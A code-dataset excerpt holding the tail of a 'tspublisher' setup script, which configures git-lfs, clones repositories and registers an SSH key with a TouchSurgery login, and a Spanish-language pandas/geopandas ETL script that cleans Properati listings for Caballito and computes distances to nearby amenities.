configure the ssh config\")\n raise\n\n\ndef check_brew_installed():\n \"\"\" Get Macs ready to brew\n \"\"\"\n if 'darwin' in get_platform():\n output, _ = get_command_output(['brew', 'help'])\n if 'usage' not in output.lower():\n raise Exception(\"Please install Brew from here: https://brew.sh/\")\n\n\ndef install_git_lfs():\n \"\"\"Install git lfs\n \"\"\"\n if 'darwin' in get_platform():\n output, _ = get_command_output(['which', 'git-lfs'])\n if 'usr' not in output.lower():\n call_command_and_print_exception(['brew', 'install', 'git-lfs'], \"brew lfs install failure\")\n\n call_command_and_print_exception(['git', 'lfs', 'install'], \"lfs install failure\")\n\n\ndef clone_repo(repository, directory):\n if not os.path.exists(directory):\n call_command_and_print_exception(['git', 'lfs', 'clone', repository, directory], \"Clone repo failure\")\n else:\n print(\"Not cloning repository: {0} already exists\".format(directory))\n\n\ndef pull_repo(directory):\n with WorkingDirectory(directory):\n call_command_and_print_exception(['git', 'lfs', 'pull', 'origin', 'master'], \"Git pull failure\")\n\n\ndef check_and_create_directory(path):\n try:\n if not os.path.exists(path):\n os.mkdir(path)\n except Exception:\n print(\"Could not find or create the directory\")\n raise ValidationError\n\n\ndef check_and_create_file(path):\n try:\n if not os.path.exists(path):\n subprocess.check_output(['touch', path])\n except Exception as e:\n print(\"Could not find or create the file\")\n print(e)\n raise ValidationError\n\n\ndef configure_git_lfs():\n \"\"\"Set relevant lfs settings\n \"\"\"\n call_command_and_print_exception(['git', 'config', '--global', 'lfs.url',\n 'https://live.touchsurgery.com/api/v3/lfs'], \"lfs config failure\")\n call_command_and_print_exception(['git', 'config', '--global', 'lfs.activitytimeout', '60'], \"lfs config failure\")\n\n\ndef create_rsa_return_pub_key():\n private_key = settings.RSA_PRIVATE_KEY_PATH\n public_key = settings.RSA_PUBLIC_KEY_PATH\n\n key = RSA.generate(2048)\n if os.path.exists(private_key):\n os.chmod(private_key, 0o0600)\n\n with open(private_key, 'wb') as rsa_pri:\n os.chmod(private_key, 0o0600)\n rsa_pri.write(key.exportKey('PEM'))\n\n pubkey = key.publickey()\n with open(public_key, 'wb') as rsa_pub:\n pub_key = pubkey.exportKey('OpenSSH')\n rsa_pub.write(pubkey.exportKey('OpenSSH'))\n\n return pub_key.split()[1]\n\n\ndef login(email, password, pub_key):\n \"\"\"Verify 
TouchSurgery user here with rsa key and TouchSurgery login\n \"\"\"\n login_instance = TouchSurgery()\n if not login_instance.login(email, password):\n return False\n if not login_instance.upload_key(pub_key):\n print('Your rsa key is invalid, please try running setup again or contact pipeline.')\n raise ValidationError\n return True\n", "sub_path": "pypi_install_script/tspublisher-0.0.1.dev2164-py2.py3-none-any/setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 7932, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "publisher.utils.get_platform", "line_number": 29, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 30, "usage_type": "call"}, {"api_name": "publisher.settings.SSH_DIRECTORY_PATH", "line_number": 33, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 33, "usage_type": "name"}, {"api_name": "sys.stdout.flush", "line_number": 34, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 34, "usage_type": "attribute"}, {"api_name": "publisher.settings.SSH_CONFIG_PATH", "line_number": 43, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 43, "usage_type": "name"}, {"api_name": "publisher.settings.GIT_DIRECTORY", "line_number": 53, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 53, "usage_type": "name"}, {"api_name": "publisher.settings.PROCEDURE_REPOSITORY", "line_number": 60, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 60, "usage_type": "name"}, {"api_name": "publisher.settings.PROCEDURE_CHECKOUT_DIRECTORY", "line_number": 60, "usage_type": "attribute"}, {"api_name": "publisher.settings.CHANNELS_REPOSITORY", "line_number": 61, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 61, "usage_type": "name"}, {"api_name": "publisher.settings.CHANNELS_CHECKOUT_DIRECTORY", "line_number": 61, "usage_type": "attribute"}, {"api_name": "publisher.settings.TRANSLATIONS_REPOSITORY", "line_number": 62, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 62, "usage_type": "name"}, {"api_name": "publisher.settings.TRANSLATIONS_CHECKOUT_DIRECTORY", "line_number": 62, "usage_type": "attribute"}, {"api_name": "subprocess.check_output", "line_number": 67, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 76, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 76, "usage_type": "attribute"}, {"api_name": "publisher.utils.get_input", "line_number": 77, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 79, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 81, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 86, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 86, "usage_type": "attribute"}, {"api_name": "publisher.utils.get_input", "line_number": 87, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 89, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 91, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 97, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 97, "usage_type": "attribute"}, {"api_name": "getpass.getpass", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": 
"attribute"}, {"api_name": "publisher.settings.RSA_PUBLIC_KEY_PATH", "line_number": 105, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 105, "usage_type": "name"}, {"api_name": "shutil.copyfile", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "publisher.settings.SSH_CONFIG_PATH", "line_number": 111, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 111, "usage_type": "name"}, {"api_name": "publisher.settings.STUDIO_GIT_PATH", "line_number": 118, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 118, "usage_type": "name"}, {"api_name": "publisher.settings.STUDIO_GIT_PATH", "line_number": 126, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 126, "usage_type": "name"}, {"api_name": "publisher.settings.RSA_PRIVATE_KEY_PATH", "line_number": 126, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path", "line_number": 130, "usage_type": "attribute"}, {"api_name": "publisher.settings.SSH_CONFIG_PATH", "line_number": 130, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 130, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 138, "usage_type": "call"}, {"api_name": "os.path", "line_number": 138, "usage_type": "attribute"}, {"api_name": "publisher.settings.SSH_CONFIG_PATH", "line_number": 138, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 138, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path", "line_number": 143, "usage_type": "attribute"}, {"api_name": "publisher.settings.SSH_CONFIG_PATH", "line_number": 143, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 143, "usage_type": "name"}, {"api_name": "publisher.utils.get_platform", "line_number": 154, "usage_type": "call"}, {"api_name": "publisher.utils.get_command_output", "line_number": 155, "usage_type": "call"}, {"api_name": "publisher.utils.get_platform", "line_number": 163, "usage_type": "call"}, {"api_name": "publisher.utils.get_command_output", "line_number": 164, "usage_type": "call"}, {"api_name": "publisher.utils.call_command_and_print_exception", "line_number": 166, "usage_type": "call"}, {"api_name": "publisher.utils.call_command_and_print_exception", "line_number": 168, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path", "line_number": 172, "usage_type": "attribute"}, {"api_name": "publisher.utils.call_command_and_print_exception", "line_number": 173, "usage_type": "call"}, {"api_name": "publisher.utils.WorkingDirectory", "line_number": 179, "usage_type": "call"}, {"api_name": "publisher.utils.call_command_and_print_exception", "line_number": 180, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 185, "usage_type": "call"}, {"api_name": "os.path", "line_number": 185, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 186, "usage_type": "call"}, {"api_name": "publisher.exceptions.ValidationError", "line_number": 189, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 194, "usage_type": "call"}, {"api_name": "os.path", "line_number": 194, "usage_type": "attribute"}, {"api_name": 
"subprocess.check_output", "line_number": 195, "usage_type": "call"}, {"api_name": "publisher.exceptions.ValidationError", "line_number": 199, "usage_type": "name"}, {"api_name": "publisher.utils.call_command_and_print_exception", "line_number": 205, "usage_type": "call"}, {"api_name": "publisher.utils.call_command_and_print_exception", "line_number": 207, "usage_type": "call"}, {"api_name": "publisher.settings.RSA_PRIVATE_KEY_PATH", "line_number": 211, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 211, "usage_type": "name"}, {"api_name": "publisher.settings.RSA_PUBLIC_KEY_PATH", "line_number": 212, "usage_type": "attribute"}, {"api_name": "publisher.settings", "line_number": 212, "usage_type": "name"}, {"api_name": "Crypto.PublicKey.RSA.generate", "line_number": 214, "usage_type": "call"}, {"api_name": "Crypto.PublicKey.RSA", "line_number": 214, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 215, "usage_type": "call"}, {"api_name": "os.path", "line_number": 215, "usage_type": "attribute"}, {"api_name": "os.chmod", "line_number": 216, "usage_type": "call"}, {"api_name": "os.chmod", "line_number": 219, "usage_type": "call"}, {"api_name": "publisher.touchsurgery.TouchSurgery", "line_number": 233, "usage_type": "call"}, {"api_name": "publisher.exceptions.ValidationError", "line_number": 238, "usage_type": "name"}]}
+{"seq_id": "473315107", "text": "import pandas as pd\nimport numpy as np\nimport math\nimport re\nimport matplotlib.pyplot as plt\nfrom statistics import mode\nfrom matplotlib import cm as cm\nfrom shapely import wkt\nfrom shapely.geometry import Point, Polygon, MultiPolygon, LinearRing\nimport geopandas as gpd\n\n#from pydrive.auth import GoogleAuth\n#from pydrive.drive import GoogleDrive\n#from google.colab import auth\n#from oauth2client.client import GoogleCredentials\n#\n#from sklearn import svm\n\npd.set_option('display.expand_frame_repr', False)\npd.options.display.float_format = '{:.2f}'.format\n\nclass tp1_ETL:\n \n def calcularDistancia(self,lat1, lon1, lat2, lon2):\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a =math.sin(dlat / 2)**2 + math.cos(lat1) * math.cos(lat2) * math.sin(dlon / 2)**2\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n return self.R * c\n \n def distanciaMinimaParque(self, lat, lon):\n listaDistancias = []\n if ((lat is not None) and (lon is not None)):\n flat=float(lat)\n flon=float(lon) \n for index, row in self.parques.iterrows():\n d = self.parques.at[index,\"Arcos\"].project(Point(flon,flat))\n p = self.parques.at[index,\"Arcos\"].interpolate(d)\n pmc = list(p.coords)[0]\n listaDistancias.append(self.calcularDistancia(math.radians(flat), math.radians(flon), math.radians(float(pmc[1])), math.radians(float(pmc[0]))))\n \n if (len(listaDistancias)>0):\n return min(listaDistancias)\n else:\n return math.nan\n\n def __init__(self):\n self.R = 6373.0\n #Authenticate and create the PyDrive client.\n #auth.authenticate_user()\n #gauth = GoogleAuth()\n #gauth.credentials = GoogleCredentials.get_application_default()\n #drive = GoogleDrive(gauth)\n #linkDS = 'https://drive.google.com/open?id=1GXhb9LJJshv_gFdiMS6PujIG8SlhaZqv' # The shareable link\n #fluff, id = linkDS.split('=')\n #downloaded = drive.CreateFile({'id':id})\n #downloaded.GetContentFile('properatti.csv')\n #\n ##https://drive.google.com/open?id=1HXMeE6Endm3g4c3JeiYIggdNcoQk6IqR -> DataSet con Lookup table Precio X m2\n #link_lookupPxM2=\"https://drive.google.com/open?id=1HXMeE6Endm3g4c3JeiYIggdNcoQk6IqR\"\n #fluff, id = link_lookupPxM2.split('=')\n #downloaded = drive.CreateFile({'id':id})\n #downloaded.GetContentFile('precioxm2_pais.csv')\n\n self.df=pd.read_csv(\"C:\\\\Users\\\\Public\\\\properati.csv\", encoding = 'utf8')\n self.df_m2=pd.read_csv(\"datasets\\\\precioxm2_pais.csv\", encoding = 'utf8')\n self.subte=pd.read_csv(\"datasets\\\\estaciones-de-subte.csv\", encoding = 'utf8')\n self.subtes=self.subte[['lon', 'lat']]\n self.hospitales=pd.read_csv(\"datasets\\\\hospitales.csv\", encoding = 'utf8')\n self.escuelas=pd.read_csv(\"datasets\\\\escuelas.csv\", encoding = 'utf8')\n self.parques=pd.read_csv(\"datasets\\\\arcos.csv\", encoding = 'utf8')\n self.barrios=pd.read_csv('datasets\\\\barrios.csv', encoding = 'utf8')\n self.barrios['WKT'] = self.barrios['WKT'].apply(wkt.loads)\n self.barrios=gpd.GeoDataFrame(geometry=self.barrios.WKT)\n self.parques['Arcos'] = self.parques['Arcos'].apply(wkt.loads)\n \n self.subtes_gdf = gpd.GeoDataFrame(self.subtes, geometry=[Point(x, y) for x, y in zip(self.subtes.lon, self.subtes.lat)], crs={'init': 'epsg:4326'})\n self.subtes_gdf.to_crs(epsg=22196,inplace=True)\n self.hospitales_gdf = gpd.GeoDataFrame(self.hospitales, geometry=[Point(x, y) for x, y in zip(self.hospitales.lon, self.hospitales.lat)], crs={'init': 'epsg:4326'})\n self.hospitales_gdf.to_crs(epsg=22196,inplace=True)\n self.escuelas_gdf = gpd.GeoDataFrame(self.escuelas, geometry=[Point(x, 
y) for x, y in zip(self.escuelas.lon, self.escuelas.lat)], crs={'init': 'epsg:4326'})\n self.escuelas_gdf.to_crs(epsg=22196,inplace=True)\n \n print(\"DataSet registros:\", len(self.df))\n print(\"DataSet Lookup Precio x m2:\", len(self.df_m2))\n \n \n\n valor_Dolar=17.8305\n \n #DROPEAMOS VARIABLES NO INTERESANTES\n cols=['price', 'currency', 'country_name', 'price_aprox_local_currency','operation','properati_url','place_with_parent_names','image_thumbnail','rooms','geonames_id']\n #cols=['price', 'currency', 'price_aprox_local_currency']\n self.df.drop(cols, axis=1, inplace=True)\n\n #FIJAR SCOPE EN CABA - Caballito\n self.df = self.df[self.df['state_name'] == 'Capital Federal']\n\n self.df['lon'].fillna(0, inplace=True)\n self.df['lat'].fillna(0, inplace=True)\n self.df = gpd.GeoDataFrame(self.df, geometry=[Point(x, y) for x, y in zip(self.df.lon, self.df.lat)])\n self.df = gpd.sjoin(self.df, self.barrios, how='inner')\n self.df.loc[:, 'place_name'] = 'Caballito'\n \n self.df.drop('state_name', axis=1, inplace=True)\n print(\"cantidad de registros:\", len(self.df))\n \n #dummificar las variables place_name y property_type\n #dummies_place=pd.get_dummies(self.df['place_name'],prefix='dummy_place_',drop_first=True)\n dummies_property=pd.get_dummies(self.df['property_type'],prefix='dummy_property_type_',drop_first=True)\n self.df=pd.concat([self.df,dummies_property],axis=1)\n #self.df=pd.concat([self.df,dummies_place],axis=1)\n\t\t\n\n #IMPUTAMOS EXPENSAS POR EL PROMEDIO\n promedio_exp=round(self.df['expenses'].mean(),2)\n print(\"promedio expensas:\", promedio_exp)\n self.df['expenses']=self.df['expenses'].fillna(promedio_exp)\n \n #ARREGLAR LATITUD Y LONGITUD A PARTIR DE LA COLUMNA LAT-LON\n latlongdf=self.df['lat-lon'].str.split(\",\",expand=True)\n self.df['lat']=latlongdf.loc[:,0]\n self.df['lon']=latlongdf.loc[:,1]\n self.df.drop('lat-lon',axis=1,inplace=True)\n\n #CORRECCION DE M2 TOTALES\n df1 = self.df[self.df['surface_total_in_m2'].isnull()]\n aux = df1['title'].str.extract(r'( a )?(\\.)?(x )?(\\d+)\\s?(m2|mt|m²)[^c](?!\\w?cub)', re.IGNORECASE)\n aux.dropna(how='all', inplace=True)\n aux=aux[(aux[0].isnull()) & (aux[1].isnull()) & (aux[2].isnull())]\n aux=aux.drop([0, 1, 2, 4], axis=1)\n aux.columns=['surface_total_in_m2']\n aux['surface_total_in_m2']=aux['surface_total_in_m2'].astype('float64')\n self.df.loc[self.df['surface_total_in_m2'].isnull(),'surface_total_in_m2'] = aux['surface_total_in_m2']\n\n aux = df1['description'].str.extract(r'( a )?(\\.)?(x )?(\\d+)\\s?(m2|mt|m²)[^c](?!\\w?cub)', re.IGNORECASE)\n aux.dropna(how='all', inplace=True)\n aux=aux[(aux[0].isnull()) & (aux[1].isnull()) & (aux[2].isnull())]\n aux=aux.drop([0, 1, 2, 4], axis=1)\n aux.columns=['surface_total_in_m2']\n aux['surface_total_in_m2']=aux['surface_total_in_m2'].astype('float64')\n self.df.loc[self.df['surface_total_in_m2'].isnull(),'surface_total_in_m2'] = aux['surface_total_in_m2']\n\n #CORRECCION DE M2 CUBIERTOS\n df1 = self.df[self.df['surface_covered_in_m2'].isnull()]\n aux = df1['title'].str.extract(r'(\\d+)\\s?(m2|mt|m²)(c[^o]|\\s?cub)', re.IGNORECASE)\n aux.dropna(how='all', inplace=True)\n aux=aux.drop([1, 2], axis=1)\n aux.columns=['surface_covered_in_m2']\n aux['surface_covered_in_m2']=aux['surface_covered_in_m2'].astype('float64')\n self.df.loc[self.df['surface_covered_in_m2'].isnull(),'surface_covered_in_m2'] = aux['surface_covered_in_m2']\n\n aux = df1['description'].str.extract(r'(\\d+)\\s?(m2|mt|m²)(c[^o]|\\s?cub)', re.IGNORECASE)\n aux.dropna(how='all', inplace=True)\n 
aux=aux.drop([1, 2], axis=1)\n aux.columns=['surface_covered_in_m2']\n aux['surface_covered_in_m2']=aux['surface_covered_in_m2'].astype('float64')\n self.df.loc[self.df['surface_covered_in_m2'].isnull(),'surface_covered_in_m2'] = aux['surface_covered_in_m2']\n\n #CORRECCION DE PRECIOS\n df1 = self.df[self.df['price_aprox_usd'].isnull()]\n aux = df1['title'].str.extract(r'(U?u?\\$[SDsd]?)\\s?(\\d+)\\.?(\\d*)\\.?(\\d*)')\n aux.dropna(inplace=True)\n aux[0]=aux[0].replace(to_replace='^\\$$', value='ARS', regex=True)\n aux[0]=aux[0].replace(to_replace='^[^A].*$', value='USD', regex=True)\n aux['currency']=aux[0]\n aux['price']=aux[1]+aux[2]+aux[3]\n aux['price']=aux['price'].astype('float64')\n aux=aux[['currency','price']]\n aux.loc[aux['currency'] == 'ARS', 'price'] = aux.loc[:, 'price']/valor_Dolar\n self.df.loc[self.df['price_aprox_usd'].isnull(),'price_aprox_usd'] = aux.loc[:, 'price']\n\n aux = df1['description'].str.extract(r'(U?u?\\$[SDsd]?)\\s?(\\d+)\\.?(\\d*)\\.?(\\d*)')\n aux=aux.dropna()\n aux[0]=aux[0].replace(to_replace='^\\$$', value='ARS', regex=True)\n aux[0]=aux[0].replace(to_replace='^[^A].*$', value='USD', regex=True)\n aux['currency']=aux[0]\n aux['price']=aux[1]+aux[2]+aux[3]\n aux['price']=aux['price'].astype('float64')\n aux=aux[['currency','price']]\n aux.loc[aux['currency'] == 'ARS', 'price'] = aux.loc[:, 'price']/valor_Dolar\n self.df.loc[self.df['price_aprox_usd'].isnull(),'price_aprox_usd'] = aux.loc[:, 'price']\n\n #COMPLETAR REGISTROS DESPUES DE LLENAR CON REGEX\n self.df.dropna(subset=['surface_total_in_m2', 'surface_covered_in_m2'], how='all', inplace=True)\n self.df.loc[(self.df['surface_total_in_m2'].isnull()) & (self.df['surface_covered_in_m2'].notnull()), 'surface_total_in_m2'] = self.df.loc[:, 'surface_covered_in_m2']\n \n #ARREGLAR DATOS CORREGIBLES\n #Arreglar precio x m2 en dólares\n self.df['price_aprox_usd']=np.round(self.df['price_aprox_usd'],0).fillna(0).astype(np.int64)\n self.df['surface_total_in_m2']=np.round(self.df['surface_total_in_m2'],0).astype(np.int64)\n\n \n \n auxval=0\n qryfiltro=\"\"\n rowcounter=0\t\n\t\t\n self.df.reset_index(drop=True, inplace=True)\n \n for index, row in self.df.iterrows():\n rowcounter+=1\n if (math.fmod(rowcounter,100)==0):print(\"Processing row:\", rowcounter)\n \n aux = pd.Series(Point(float(self.df.at[index,\"lon\"]), float(self.df.at[index,\"lat\"])))\n aux = gpd.GeoDataFrame(aux, geometry=aux, crs={'init':'epsg:4326'})\n aux.to_crs(epsg=22196,inplace=True)\n aux = aux.loc[0,'geometry']\n \n self.df.at[index,\"distSubte\"] = min(self.subtes_gdf.distance(aux))\n self.df.at[index,\"distEscuela\"] = min(self.escuelas_gdf.distance(aux))\n self.df.at[index,\"distHospital\"] = min(self.hospitales_gdf.distance(aux))\n self.df.at[index,\"distParque\"] = self.distanciaMinimaParque(self.df.at[index,\"lat\"], self.df.at[index,\"lon\"])\n\n \n\n vcols=[\"acondicionado\",\"amenities\",\"alarma\",\"ascensor\",\"balcon\",\"baulera\",\"blindada\",\"calefaccion\",\n \"cancha\",\"cine\",\"cochera\",\"contrafrente\",\"crédito\",\"electrógeno\",\"estrenar\",\"fitness\",\"frente\",\"frio-calor\",\n \"guardacoche\",\"gimnasio\",\"jacuzzi\",\"hidromasaje\",\"hospital\",\n \"jardin\",\"lavarropas\",\"lavadero\",\"laundry\",\"luminoso\",\"living\",\"metrobus\",\"multisplit\",\"parque\",\n \"patio\",\"parrilla\",\"pentahome\",\"pileta\",\"premium\",\"piscina\",\"policlínico\",\"profesional\",\n \"quincho\",\"refrigeración\",\"residencial\",\"reciclado\",\"pozo\",\"sauna\",\n 
\"spa\",\"split\",\"solarium\",\"sum\",\"S.U.M\",\"subte\",\"suite\",\"seguridad\",\"terraza\",\"vigilancia\"]\n\n for x in vcols:\n self.df[\"dummy_\" + x]=self.df[\"description\"].str.contains(x).astype(int)\n \n \n #HACEMOS EL RECORTE\n cant_regs_total=len(self.df)\n cant_regs_train=math.trunc((cant_regs_total/100)*80)\n print(\"cant. regs. totales:\", cant_regs_total)\n print(\"cant. regs. train:\", cant_regs_train)\n df_test=self.df.iloc[cant_regs_train:cant_regs_total,:]\n df_test['precio_m2_usd']=df_test['price_usd_per_m2']\n print(\"df_test:\" ,len(df_test))\n \n self.df.loc[(self.df['price_usd_per_m2'].isnull()) & (self.df['price_aprox_usd'].notnull()) & (self.df['surface_total_in_m2'].notnull()), 'price_usd_per_m2'] = self.df.loc[:, 'price_aprox_usd']/self.df.loc[:, 'surface_total_in_m2']\n self.df.drop(['surface_covered_in_m2', 'price_per_m2'], axis=1, inplace=True)\n self.df['precio_m2_usd']=np.round(self.df['price_aprox_usd'] / self.df['surface_total_in_m2'],0)\n\n\n #LIMPIAR BASURA\n self.df=self.df[pd.to_numeric(self.df['dummy_property_type__store'], errors='coerce').notnull()]\n self.df=self.df[pd.to_numeric(self.df['dummy_property_type__apartment'], errors='coerce').notnull()]\n self.df=self.df[pd.to_numeric(self.df['dummy_property_type__house'], errors='coerce').notnull()]\n self.df=self.df[pd.to_numeric(self.df['lat'], errors='coerce').notnull()]\n self.df=self.df[pd.to_numeric(self.df['lon'], errors='coerce').notnull()]\n self.df=self.df[pd.to_numeric(self.df['distSubte'], errors='coerce').notnull()]\n\n #Guardamos el dataset antes del recorte\n self.df.to_csv(\"datasets\\\\properati_caballito.csv\",encoding='utf-8')\t\t\n \n \n #df_test[\"price_usd_per_m2\"]=0\n \n self.df=self.df.iloc[:cant_regs_train,:]\n \n for index, row in self.df.iterrows():\n if not (row.property_type == ''):\n \n if (self.df.at[index,\"price_usd_per_m2\"] == 0):\n qryfiltro=\"place_name=='\" + row.place_name + \"'\"\n qryfiltro+=\" and (m2_Desde<=\" + str(row.surface_total_in_m2)\n qryfiltro+=\" and m2_Hasta>=\" + str(row.surface_total_in_m2) + \")\"\n\n auxval=self.df_m2.query(qryfiltro).Valor_usd\n #print(\"auxval:\" , auxval)\n #print(\"len(auxval):\" , len(auxval))\n \n if (len(auxval)>=2):\n self.df.at[index,\"price_usd_per_m2\"]=auxval[1]\n \n\n #FILTRAR OUTLIERS\n qryFiltro=\"(price_aprox_usd >= 50000 and price_aprox_usd <= 500000)\"\n qryFiltro+=\" and (surface_total_in_m2 >= 35 and surface_total_in_m2 <= 500)\"\n #qryFiltro+=\" and (surface_total_in_m2 >= surface_covered_in_m2)\"\n qryFiltro+=\" and (precio_m2_usd <= 7000 and precio_m2_usd >= 2000)\"\n qryFiltro+=\" and (price_usd_per_m2 <= 7000 and price_usd_per_m2 >= 2000)\"\n \n self.df=self.df.query(qryFiltro)\n df_test=df_test.query(qryFiltro)\n \n \n self.df[\"rooms\"]=round(self.df['surface_total_in_m2'] / 10,0)\n df_test[\"rooms\"]=round(df_test['surface_total_in_m2'] / 10,0)\n \n\n df_test.to_csv(\"datasets\\\\properati_caballito_test.csv\",encoding=\"utf8\")\n self.df.to_csv(\"datasets\\\\properati_caballito_train.csv\",encoding='utf-8')\n print(\"campos de salida:\", self.df.columns)\n #uploaded = drive.CreateFile({'Properati_fixed': 'Properati_fixed.csv'})\n #uploaded.SetContentFile(\"Properati_fixed.csv\")\n #uploaded.Upload()\n\n print(\"All done!\")\n\n\nx=tp1_ETL()\n", "sub_path": "TP1y2/TP_ETL.py", "file_name": "TP_ETL.py", "file_ext": "py", "file_size_in_byte": 15236, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pandas.set_option", 
"line_number": 19, "usage_type": "call"}, {"api_name": "pandas.options", "line_number": 20, "usage_type": "attribute"}, {"api_name": "math.sin", "line_number": 27, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 27, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 28, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 28, "usage_type": "call"}, {"api_name": "shapely.geometry.Point", "line_number": 37, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 40, "usage_type": "call"}, {"api_name": "math.nan", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 65, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 66, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 67, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 69, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 71, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 72, "usage_type": "call"}, {"api_name": "shapely.wkt.loads", "line_number": 73, "usage_type": "attribute"}, {"api_name": "shapely.wkt", "line_number": 73, "usage_type": "name"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 74, "usage_type": "call"}, {"api_name": "shapely.wkt.loads", "line_number": 75, "usage_type": "attribute"}, {"api_name": "shapely.wkt", "line_number": 75, "usage_type": "name"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 77, "usage_type": "call"}, {"api_name": "shapely.geometry.Point", "line_number": 77, "usage_type": "call"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 79, "usage_type": "call"}, {"api_name": "shapely.geometry.Point", "line_number": 79, "usage_type": "call"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 81, "usage_type": "call"}, {"api_name": "shapely.geometry.Point", "line_number": 81, "usage_type": "call"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 101, "usage_type": "call"}, {"api_name": "shapely.geometry.Point", "line_number": 101, "usage_type": "call"}, {"api_name": "geopandas.sjoin", "line_number": 102, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 110, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 111, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 128, "usage_type": "attribute"}, {"api_name": "re.IGNORECASE", "line_number": 136, "usage_type": "attribute"}, {"api_name": "re.IGNORECASE", "line_number": 146, "usage_type": "attribute"}, {"api_name": "re.IGNORECASE", "line_number": 153, "usage_type": "attribute"}, {"api_name": "numpy.round", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 190, "usage_type": "attribute"}, {"api_name": "numpy.round", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 191, "usage_type": "attribute"}, {"api_name": "math.fmod", "line_number": 203, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 205, "usage_type": "call"}, {"api_name": "shapely.geometry.Point", "line_number": 205, "usage_type": "call"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 206, "usage_type": "call"}, {"api_name": "math.trunc", "line_number": 231, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 240, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 244, "usage_type": "call"}, {"api_name": 
"pandas.to_numeric", "line_number": 245, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 246, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 247, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 248, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 249, "usage_type": "call"}]}
